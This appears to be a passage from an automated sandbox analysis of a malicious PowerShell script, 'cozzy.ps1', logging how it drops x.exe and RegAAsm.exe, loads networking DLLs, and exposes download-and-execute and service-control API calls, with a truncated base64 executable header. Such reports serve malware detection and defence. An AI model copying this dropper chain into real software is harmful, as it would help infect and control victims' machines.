                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCommand line argument: Exe4_2_0040E560
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCommand line argument: Exe4_2_0040E560
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCommand line argument: Rmc-7J4RV44_2_0040E560
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCommand line argument: TcG4_2_0040E560
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCommand line argument: TcG4_2_0040E560
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCommand line argument: Inj4_2_0040E560
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCommand line argument: Inj4_2_0040E560
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCommand line argument: TcG4_2_0040E560
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCommand line argument: lcG4_2_0040E560
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCommand line argument: @)i4_2_0040E560
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCommand line argument: @)i4_2_0040E560
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCommand line argument: @)i4_2_0040E560
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCommand line argument: @)i4_2_0040E560
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCommand line argument: TcG4_2_0040E560
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCommand line argument: exepath4_2_0040E560
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCommand line argument: TcG4_2_0040E560
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCommand line argument: exepath4_2_0040E560
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCommand line argument: @)i4_2_0040E560
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCommand line argument: licence4_2_0040E560
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCommand line argument: TcG4_2_0040E560
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCommand line argument: 0aG4_2_0040E560
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCommand line argument: l]G4_2_0040E560
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCommand line argument: System4_2_0040E560
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCommand line argument: Administrator4_2_0040E560
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCommand line argument: User4_2_0040E560
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCommand line argument: TcG4_2_0040E560
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCommand line argument: del4_2_0040E560
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCommand line argument: del4_2_0040E560
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCommand line argument: del4_2_0040E560
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCommand line argument: TcG4_2_0040E560
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                      Source: cozzy.ps1Virustotal: Detection: 27%
                      Source: cozzy.ps1ReversingLabs: Detection: 31%
                      Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cozzy.ps1"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\System32\notepad.exe "C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\cozzy.ps1"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\user\AppData\Local\Temp\RegAAsm.exe "C:\Users\user\AppData\Local\Temp\RegAAsm.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\user\AppData\Local\Temp\RegAAsm.exe "C:\Users\user\AppData\Local\Temp\RegAAsm.exe" Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: mrmcorer.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: efswrt.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: oleacc.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dlnashext.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wpdshext.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11659a23-5884-4d1b-9cf6-67d6f4f90b36}\InProcServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior

                      Data Obfuscation

                      barindex
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAAZIYCAJ
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_0041D0CF LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,4_2_0041D0CF
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_00007FFC3C0C0AC3 push ebx; retf 3_2_00007FFC3C0C0AC4
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_004570CF push ecx; ret 4_2_004570E2
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_00435226 push ecx; ret 4_2_00435239
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_00457A00 push eax; ret 4_2_00457A1E
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_004062E2 ShellExecuteW,URLDownloadToFileW,4_2_004062E2
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\user\AppData\Local\Temp\RegAAsm.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_0041AC43 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,4_2_0041AC43
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_0041D0CF LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,4_2_0041D0CF
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
